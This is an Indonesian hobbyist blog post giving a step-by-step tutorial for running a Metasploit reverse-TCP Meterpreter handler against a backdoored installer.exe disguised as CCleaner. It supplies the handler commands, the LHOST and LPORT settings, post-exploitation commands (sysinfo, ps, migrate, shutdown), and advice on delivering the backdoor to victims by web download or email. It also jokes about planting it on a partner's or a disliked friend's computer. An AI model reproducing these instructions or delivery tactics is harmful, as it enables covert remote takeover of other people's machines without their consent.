Menjalankan Backdoor installer.exe dengan Metasploit di linux


hello guys ketemu lagi bersama saya Mr.gagaltotal666
huh kali ini saya akan melanjutkan tips dari sebelum nya yaitu [membuat backdoor installer.exe]
kali ini saya akan share cara menggunakan backdoor tersebut dengan tools di linux yaitu Metasploit
disini saya menggunakan Parrot Os
ok ikuti step by step nya

pertama kalian buka terminal kalian dengan ketikan :

" msfconsole "



setelah itu kalian ketikan perintah ini :

" use multi/handler "


setelah itu ketikan perintah :

" set payload windows/meterpreter/reverse_tcp "


kemudian ketikan perintah lagi :

" set LHOST 192.168.186.128 " >> disini lhost nya lhost dari pas kita buat di backdoor

" set LPORT 4444 " >> lport yang dari backdoor kita


lalu ketikan perintah :

" exploit " >> untuk menjalankan nya atau juga bisa " run "


nah setelah sudah dijalankan , kirim backdoor kita ke target kita
misal nya kalian ingin backdoor kalian masuk ke komputer target dengan cara entah kalian taruh file nya di web biar target download file backdoor ente dan atau kirim backdoor melalui email
atau bisa iseng juga backdoor ini taruh di komputer/laptop pacar lu dan temen lu yang lu benci wkwkwk
ok disini ane cerita nya udah live target pake komputer kesayangan ane uji coba :'( -__-


disitu ane taruh backdoor nya di file download windows
gimane backdoor ane mirip kan exe dengan CClearner nya :V
setelah itu klik setup.exe nya


dan upss hahaha meterpreter akan terbuka dan kita bisa mengeksekusi komputer target kita
dan liat setup eror ? kenapa karena ya lah backkdoor ane buat virus hahah
jangan panik kalau lu uji coba ke komputer temen lu dan komputer sendiri
saya sarankan pakai antivirus Eset dan bitdefender buat ujicoba ini , karena backdoor yang kita buat dari linux itu lumayan ganas kalau antivirus kita ecek ecek mah
ok liat nih meterpreter sudah terbuka


untuk mengecek komputer terget ketikan perintah :

" sysinfo "

dan untuk masuk ke system program local C di windows nya ketikan perintah :

" ps "


oh iya sebelum target kita tutup isntaller.exe yang dari backdoor kita , maka nanti meterpreter akan close , nah gimana jika meterpreter biar ada walaupun terget menutup backdoor kita ?
cara nya ketikan perintah ini :

" migrate 6108

untuk mematikan kompuer target kita  : " shutdown "
udah ahh cukup sini aja nanti ilmu ini dipake yang jahat :P

ok sekian tips nya dari saya ^_^ semoga bermanfaat

NB : DILARANG MENGAMBIL GAMBAR ATAU PLAGIAT GAMBAR DARI SINI !
Previous
Next Post »